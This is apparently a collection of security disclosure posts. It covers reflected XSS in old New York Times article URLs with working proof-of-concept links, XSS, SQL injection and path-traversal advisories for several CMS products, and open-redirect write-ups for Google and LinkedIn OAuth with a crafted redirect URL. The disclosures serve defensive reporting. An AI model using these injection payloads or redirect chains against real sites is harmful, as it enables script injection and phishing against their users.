The New York Times Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)

 
 

binary_data_illustratio_450

 

Domain:
http://www.nytimes.com/

 

“The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper’s print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as “The Gray Lady”, The New York Times is long regarded within the industry as a national “newspaper of record”. It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper’s publisher and the company’s chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper’s motto, “All the News That’s Fit to Print”, appears in the upper left-hand corner of the front page.” (Wikipedia)

 

 

 

(1) Vulnerability Description:

The New York Times has a computer cyber security problem. Hacker can exploit its users by XSS bugs.

 

The code program flaw occurs at New York Times’s URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes does not filter the content used for the construction at all before 2013.

 

Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All pages of articles). In fact, all article pages that contain “PRINT” button, “SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.

 

Nytimes changed this mechanism since 2013. It decodes the URLs sent to its server. This makes the mechanism much safer now.

 

However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter URLs before is cost. It costs too much (money & human capital) to change the database of all posted articles before.

 

 

nytimes_2010_xss

 

nytimes_2011_xss

 

 

 

 

Living POCs Codes:

http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//’ “><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0

http://www.nytimes.com/2010/12/07/opinion/07brooks.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2009/08/06/technology/06stats.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2008/07/09/dining/091crex.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//’ “><img src=x onerror=prompt(/justqdjing/)>

 

 

 

(2) Vulnerability Analysis:
Take the following link as an example,
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“><vulnerabletoattack

 

It can see that for the page reflected, it contains the following codes. All of them are vulnerable.

 

<li class=”print”>

<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a>

</li>

 

<li class=”singlePage”>

<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?pagewanted=all”></a>

</li>

 

<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a>

</li>

 

<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a>

</li>

 

<a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>Next Page »</testtesttest?pagewanted=2″></a>

 

 

 

 

(3) What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

 

“Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet.” (Acunetix)

 

The vulnerability can be attacked without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.

 

 

 

Discover and Reporter:
Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)

 

 

 

 

More Details:
http://lists.openwall.net/full-disclosure/2014/10/16/2
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102
http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss
http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss
https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1
http://webtech.lofter.com/post/1cd3e0d3_6f57c56
http://tetraph.blog.163.com/blog/static/2346030512014101270479/
https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss
http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles
http://securityrelated.blogspot.com/2014/10/new-york-times-design.html
https://mathfas.wordpress.com/2014/11/01/new-york-times-xss
http://computerobsess.blogspot.com/2014/10/new-york-times-design.html
http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss
http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss

 

 

 

CVE-2015-2349 – SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Web Security Vulnerabilities

Macro computer screen shot with binary code and password tex, great concept for computer, technology  and online security.

CVE-2015-2349 – SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Web Security Vulnerabilities



Exploit Title: CVE-2015-2349 – SuperWebMailer /defaultnewsletter.php” HTMLForm Parameter XSS Web Security Vulnerabilities

Product: SuperWebMailer

Vendor: SuperWebMailer

Vulnerable Versions: 5.*.0.* 4.*.0.*

Tested Version: 5.*.0.* 4.*.0.*

Advisory Publication: March 11, 2015

Latest Update: May 03, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2015-2349

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

CVSS Version 2 Metrics:

Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism

Access Complexity: Medium

Authentication: Not required to exploit

Impact Type: Allows unauthorized modification

Author and Creditor: Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)








Information Details:



(1) Vendor & Product Description:



Vendor:

SuperWebMailer




Product & Vulnerable Versions:

SuperWebMailer

5.60.0.01190

5.50.0.01160

5.40.0.01145

5.30.0.01123

5.20.0.01113

5.10.0.00982

5.05.0.00970

5.02.0.00965

5.00.0.00962

4.50.0.00930

4.40.0.00917

4.31.0.00914

4.30.0.00907

4.20.0.00892

4.10.0.00875



Vendor URL & Download:

SuperWebMailer can be gained from here,

http://www.superwebmailer.de/




Product Introduction Overview:

“Super webmail is a web-based PHP Newsletter Software. The web-based PHP Newsletter Software Super webmail is the optimal solution for the implementation of a successful e-mail marketing.”


“To use the online PHP Newsletter Script is your own website / server with PHP 4 or newer, MySQL 3.23 or later and the execution of CronJobs required. Once installed, the online newsletter software Super webmail can be served directly in the browser. The PHP Newsletter Tool Super webmail can therefore be used platform-independent all operating systems such as Windows, Linux, Apple Macintosh, with Internet access worldwide. The PHP Newsletter Script allows you to manage your newsletter recipients including registration and deregistration from the newsletter mailing list by double-opt In, Double Opt-Out and automatic bounce management. Send online your personalized newsletter / e-mails in HTML and Text format with embedded images and attachments immediately in the browser or by CronJob script in the background immediately or at a later. With the integrated tracking function to monitor the success of the newsletter mailing, if thereby the openings of the newsletter and clicks on links in the newsletter graphically evaluated and presented. Put the integrated autoresponder to autorun absence messages or the receipt of e-mails to confirm.”


“It is now included CKEditor 4.4.7. An upgrade to the latest version is recommended as an in CKEditor 4.4.5 Vulnerability found. Super webmail from immediately contains new chart component for the statistics that do not need a flash and are therefore also represented on Apple devices. For the Newsletter tracking statistics is now an easy print version of the charts available that can be printed or saved with PDF printer driver installed in a PDF file. When viewing the e-mails in the mailing lists of the sender of the email is displayed in a column that sent the e-mail to the mailing list. For form creation for the newsletter subscription / cancellation are now available variant”






(2) Vulnerability Details:

SuperWebMailer web application has a computer security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server.



Several other related products 0-day vulnerabilities have been found by some other bug hunter researchers before. SuperWebMailer has patched some of them. FusionVM Vulnerability Management and Compliance provides sources for the latest info-sec news, tools, and advisories. It has published suggestions, advisories, solutions details related to web application vulnerabilities.


(2.1) The programming code flaw occurs at “&HTMLForm” parameter in “defaultnewsletter.php?” page.










Related Work:

http://seclists.org/fulldisclosure/2015/Mar/55

http://www.securityfocus.com/bid/73063

http://lists.openwall.net/full-disclosure/2015/03/07/3

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819

http://packetstormsecurity.com/files/131288/ECE-Projects-Cross-Site-Scripting.html

http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142551542201539&w=2

https://cxsecurity.com/issue/WLB-2015030043

http://aibiyi.lofter.com/post/1cc9f4e9_6edf9bf

http://tetraph.tumblr.com/post/118764414962/canghaixiao-cve-2015-2349-superwebmailer

http://canghaixiao.tumblr.com/post/118764381217/cve-2015-2349-superwebmailer-5-50-0-01160-xss

http://essaybeans.lofter.com/post/1cc77d20_6edf28c

https://www.facebook.com/essaybeans/posts/561250300683107

https://twitter.com/essayjeans/status/598021595974602752

https://www.facebook.com/pcwebsecurities/posts/687478118064775

http://tetraph.blog.163.com/blog/static/234603051201541231655569/

https://plus.google.com/112682696109623633489/posts/djqcrDw5dQp

http://essayjeans.blogspot.com/2015/05/cve-2015-2349-superwebmailer-550001160.html

https://mathfas.wordpress.com/2015/05/12/cve-2015-2349-superwebmailer-5-50-0-01160-xss/

http://www.tetraph.com/blog/xss-vulnerability/cve-2015-2349-superwebmailer-5-50-0-01160-xss/

https://vulnerabilitypost.wordpress.com/2015/05/12/cve-2015-2349-superwebmailer-5-50-0-01160-xss/

http://aibiyi.blogspot.com/2015/05/cve-2015-2349-superwebmailer-550001160.html





724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities

enigma_sifre_cozucu_nettekeyif.net

 

724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities

 

Exploit Title: 724CMS Multiple XSS (Cross-site Scripting) Security Vulnerabilities

Vendor: 724CMS

Product: 724CMS

Vulnerable Versions: 3.01 4.01 4.59 5.01

Tested Version: 5.01

Advisory Publication: March 15, 2015

Latest Update: March 15, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

 

 

 

Recommendation Details:

 

(1) Vendor & Product Description:

Vendor:

724CMS Enterprise

 

Product & Vulnerable Versions:

724CMS

3.01

4.01

4.59

5.01

 

Vendor URL & download:

724CMS can be purchased from here,

http://724cms.com/

 

Product Introduction Overview:

“724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment.”

“A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows.”

 

 

(2) Vulnerability Details:

724CMS web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation’s most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities.

 

(2.1) The first code programming flaw occurs at “/index.php” page with “&Lang” parameter.

(2.2) The second code programming occurs at “/section.php” page with “&Lang”, “&ID”, “&Nav” parameters.

 

 

 

 

References:

http://www.tetraph.com/security/xss-vulnerability/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/

http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-xss-cross-site.html

http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/

http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/

https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/

http://marc.info/?l=full-disclosure&m=142576259903051&w=4

https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html

http://en.hackdig.com/?16117.htm

724CMS 5.01 Multiple SQL Injection Security Vulnerabilities

encrypt

 

724CMS 5.01 Multiple SQL Injection Security Vulnerabilities

 

Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities

Vendor: 724CMS

Product: 724CMS

Vulnerable Versions: 3.01 4.01 4.59 5.01

Tested Version: 5.01

Advisory Publication: March 14, 2015

Latest Update: March 14, 2015

Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) [CWE-89]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)

Impact Subscore: 6.4

Exploitability Subscore: 10.0

Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

 

 

 

Recommendation Details:

 

(1) Vendor & Product Description:

Vendor:

724CMS Enterprise

 

Product & Vulnerable Versions:

724CMS

3.01

4.01

4.59

5.01

 

Vendor URL & download:

724CMS can be gain from here,

http://724cms.com/

 

Product Introduction Overview:

“724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment.”

“A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows.”

 

 

(2) Vulnerability Details:

724CMS web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation’s most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has phase, votes, comments and proposed details related to 724CMS vulnerabilities.

 

(2.1) The first cipher programming flaw occurs at “/index.php” page with “&Lang”, “&ID” parameters.

(2.2) The second cipher programming flaw occurs at “/section.php” page with “&Lang”, “&ID” parameters.

 

 

 

 

References:

http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/

http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html

http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/

http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/

https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/

https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html

http://marc.info/?a=139222176300014&r=1&w=4

http://en.1337day.com/exploit/23308

724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities

08NEncryptionKeymaster-1374242307339

 

724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities

 

Exploit Title: 724CMS /section.php Module Parameter Directory Traversal Security Vulnerabilities

Vendor: 724CMS

Product: 724CMS

Vulnerable Versions: 3.01 4.01 4.59 5.01

Tested Version: 5.01

Advisory Publication: March 14, 2015

Latest Update: March 14, 2015

Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) [CWE-22]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)

Impact Subscore: 6.4

Exploitability Subscore: 10.0

Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]

 

 

 

Recommendation Details:

 

(1) Vendor & Product Description:

Vendor:

724CMS Enterprise

 

Product & Vulnerable Versions:

724CMS

3.01

4.01

4.59

5.01

 

Vendor URL & download:

724CMS can be bargained from here,

http://724cms.com/

 

Product Introduction Overview:

“724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment.”

“A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows.”

 

 

(2) Vulnerability Details:

724CMS web application has a security bug problem. It can be exploited by Directory Traversal – Local File Include (LFI) attacks. A local file inclusion (LFI) flaw is due to the script not properly sanitizing user input, specifically path traversal style attacks (e.g. ‘../../’) supplied to the parameters. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote host . This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation’s most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities.

 

(2.1) The first cipher programming flaw occurs at “/section.php” page with “&Module” parameter.

 

 

 

 

References:

http://www.tetraph.com/security/directory-traversal-vulnerability/724cms-5-01-directory-path-traversal-security-vulnerabilities/

http://securityrelated.blogspot.com/2015/03/724cms-501-directory-path-traversal.html

http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-directory-path-traversal-security-vulnerabilities/

http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-directory-path-traversal-security-vulnerabilities/

https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-directory-path-traversal-security-vulnerabilities/

http://marc.info/?a=139222176300014&r=1&w=4

http://en.hackdig.com/wap/?id=17404

 

CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerability

CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerability

 

Exploit Title: Smartwebsites SmartCMS v.2 Multiple SQL Injection Security Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: CVE-2014-9558
CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]

 

 

Advisory Details:

 

(1) Vendor & Product Description

 

Vendor: Smartwebsites

 

Product & Version: SmartCMS v.2

 

Vendor URL & Download:

 

Product Description:
“SmartCMS is one of the most user friendly and smart content management systems there is in the Cyprus market. It makes the content management of a webpage very easy and simple, regardless of the user’s technical skills.”

 

(2) Vulnerability Details:
SmartCMS v.2 has a security vulnerability. It can be exploited by SQL Injection attacks.

 

(2.1) The first vulnerability occurs at “index.php?” page with “pageid” “lang” multiple parameters.

 

(2.2) The second vulnerability occurs at “sitemap.php?” page with “pageid” “lang” multiple parameters.

 

 

References:

 

Alle Links zu New York Times Artikel Vor 2013 anfällig für XSS-Angriffe

Alle Links zu New York Times Artikel Vor 2013 anfällig für XSS-Angriffe

 

URLs, um Artikel in der New York Times (NYT) vor 2013 veröffentlicht wurden gefunden anfällig für einen XSS (Cross-Site Scripting) Angriff der Lage ist, Code im Kontext des Web-Browsers ausgeführt werden zu können.

 

thedhruvsoni_1372883880_65


Basierend auf nytimes die Gestaltung, fast alle URLs vor 2013 sind betroffen (Alle Seiten von Artikeln). In der Tat, alle Artikel Seiten, die Schaltfläche “Drucken”, “Jede Seite” Taste enthalten, werden “Seite *” Taste “NEXT PAGE” -Taste beeinflusst.

 

Nytimes geändert diesen Mechanismus seit 2013. Es decodiert die URLs, seine Server gesendet. Dadurch ist der Mechanismus nun viel sicherer.

 

Jedoch werden alle URLs vor 2013 immer noch mit dem alten Mechanismus. Das bedeutet fast allen Artikelseiten vor 2013 sind immer noch anfällig für XSS-Angriffe. Ich denke, der Grund, nytimes keine URLs filtern, bevor die Kosten. Es kostet zu viel (Geld und Humankapital), um in der Datenbank nach Artikel gepostet, bevor ändern.

 

Die Sicherheitslücke wurde von einem Mathematik Doktorand Wang Jing von der Schule für Physikalische und Mathematische Wissenschaften (SPMS), Nanyang Technological University, Singapur.

 

POC und Blog Erklärung von Wang gegeben,
https://www.youtube.com/watch?v=RekCK5tjXWQ
http://tetraph.com/security/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/

 

Unterdessen sagte Wang: “Die New York Times hat einen neuen Mechanismus jetzt angenommen. Dies ist eine bessere Schutzmechanismus.”

 

 

Auch wenn die Artikel sind alt, sind die Seiten noch relevant
Ein Angriff auf neueren Artikel würde auf jeden Fall haben erhebliche Auswirkungen gehabt, aber Artikeln von 2012 oder sogar noch älter sind alles andere als überholt. Es wäre immer noch im Rahmen eines Angriffs von Bedeutung sein.

 

Cyberkriminelle können verschiedene Möglichkeiten, um den Link, um potenzielle Opfer zu senden und aufzuzeichnen hohen Erfolgsraten, alle mit mehr gezielte Angriffe zu entwickeln.

 

 

Was ist XSS?
Cross-Site Scripting (XSS) ist eine Art von Computer-Sicherheitslücke in der Regel in Web-Anwendungen gefunden. XSS ermöglicht es Angreifern, clientseitige Skript in Webseiten, die von anderen Benutzern eingesehen zu injizieren. Eine Cross-Site-Scripting-Schwachstelle kann von Angreifern wie der Same Origin Policy verwendet werden, um Zugangskontrollen zu umgehen. Cross-Site Scripting auf Webseiten durchgeführt entfielen rund 84% aller Sicherheitslücken von Symantec ab 2007 dokumentiert (Wikipedia)

 

 

 

 

Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net

Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net

Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net
— Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net

The vulnerability exists at “Logout?” page with “&continue” parameter, i.e.
The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

(1) When a user is redirected from Google to another site, Google will check whether the redirected URL belongs to domains in Google’s whitelist (The whitelist usually contains websites belong to Google), e.g.
If this is true, the redirection will be allowed.
However, if the URLs in a redirected domain have open URL redirection  vulnerabilities themselves, a user could be redirected from Google to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Google directly.
One of the vulnerable domain is,
googleads.g.doubleclick.net (Google’s Ad System)

(2) Use one webpage for the following tests. The webpage address is “http://www.inzeed.com/kaleidoscope“. We can suppose that this webpage is malicious.
Vulnerable URL:

POC:

POC Video:
Reporter:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang Technological University, Singapore.
Related Articles:

LinkedIn Online Service OAuth 2.0 Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)

logolinkedin

 

LinkedIn Online Service OAuth 2.0 Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)

 

(1) Domain:
linkedin.com

 

“LinkedIn /ˌlɪŋkt.ˈɪn/ is a business-oriented social networking service. Founded in December 2002 and launched on May 5, 2003, it is mainly used for professional networking. In 2006, LinkedIn increased to 20 million members. As of March 2015, LinkedIn reports more than 364 million acquired users in more than 200 countries and territories. The site is available in 24 languages, including Arabic, Chinese, English, French, German, Italian, Portuguese, Spanish, Dutch, Swedish, Danish, Romanian, Russian, Turkish, Japanese, Czech, Polish, Korean, Indonesian, Malay, and Tagalog. As of 2 July 2013, Quantcast reports LinkedIn has 65.6 million monthly unique U.S. visitors and 178.4 million globally, a number that as of 29 October 2013 has increased to 184 million. In June 2011, LinkedIn had 33.9 million unique visitors, up 63 percent from a year earlier and surpassing MySpace. LinkedIn filed for an initial public offering in January 2011 and traded its first shares on May 19, 2011, under the NYSE symbol “LNKD”.” (Wikipedia)

 

 

 

 

(2) Vulnerability Description:

LinkedIn web application has a computer security problem. Hacker can exploit it by Covert Redirect cyber attacks.

 

The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.

 

 

 


(2.1) Vulnerability Detail:

Linkedin’s OAuth 2.0 system is susceptible to Attacks. More specifically, the authentication of parameter “&redirct_uri” in OAuth 2.0 system is insufficient. It can be misused to design Open Redirect Attacks to Linkedin.

 

It increases the likelihood of successful Open Redirect Attacks to third-party websites, too.

 

LinkedIn replied with thanks and said that they “have published a blog post on how [they] intend to address [the problem].”

 

 

Blog address:
https://developer.linkedin.com/blog/register-your-oauth-2-redirect-urls

 

 

The vulnerabilities occurs at page “/oauth2/authorization?” with parameter “&redirect_uri”, e.g.
https://www.linkedin.com/uas/oauth2/authorization?response_type=code&client_id=773svxj8m007qf&state=5316b8f3ea22a6.60933041&redirect_uri=http%3A%2F%2Fwww.inc.com%2Flogout%3Fret%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Fthatday.html [1]

 

When a logged-in Linkedin user clicks the URL ([1]) above, he/she will be asked for consent as in whether to allow a third-party website to receive his/her information. If the user clicks OK, he/she will be then redirected to the URL assigned to the parameter “&redirect_uri”.

 

If a user has not logged onto Linkedin and clicks the URL ([1]) above, the same situation will happen upon login.

 

 

 

(2.1.1) Linkedin would normally allow all the URLs that belong to the domain of an authorized third-party website. However, these URLs could be prone to manipulation. For example, the “&redirect_uri” parameter in the URLs is supposed to be set by the third-party websites, but an attacker could change its value to make Attacks.

 

Hence, a user could be redirected from Linkedin to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site unwillingly. This is as if the user is redirected from Linkedin directly. The number of Linkedin’s OAuth 2.0 client websites is so huge that such Attacks could be commonplace.

 

Linkedin’s OAuth 2.0 system makes the redirects appear more trustworthy and could potentially increase the likelihood of successful Open Redirect Attacks of third-party website.

 

At the same time, attackers could completely bypass Linkedin’s authentication system and attack more easily.

 

It might be of Linkedin’s interest to patch up against such attacks.

 

 

 

(2.2) Use one of webpages for the following tests. The webpage is “http://homehut.lofter.com/“. Can suppose it is malicious.

 

Below is an example of a vulnerable third-party domain:
inc.com

 

Vulnerable URL in this domain:
http://www.inc.com/logout?ret=http://www.tetraph.com/essayjeans/poems/thatday.html

 

Vulnerable URL from Linkedin that is related to inc.com:
https://www.linkedin.com/uas/oauth2/authorization?response_type=code&client_id=773svxj8m007qf&state=53169feb993957.93834988&redirect_uri=http%3A%2F%2Fdev-www.inc.com%2Fpatch%2Freflex%2Flib%2Flinkedin%2Fstartlogin.php

 

POC:
https://www.linkedin.com/uas/oauth2/authorization?response_type=code&client_id=773svxj8m007qf&state=5316b8f3ea22a6.60933041&redirect_uri=http%3A%2F%2Fwww.inc.com%2Flogout%3Fret%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Fthatday.html

 

 


POC Video:
https://www.youtube.com/watch?v=iif6eq2cvso

 

Blog Detail:
http://tetraph.blogspot.com/2014/05/linkedin-oauth-20-covert-redirect.html

 

 

 

(3) What is Covert Redirect?

Covert Redirect is a class of security bugs disclosed in May 2014. It is an application that takes a parameter and redirects a user to the parameter value without sufficient validation. This often makes use of Open Redirect and XSS (Cross-site Scripting) vulnerabilities in third-party applications.

 

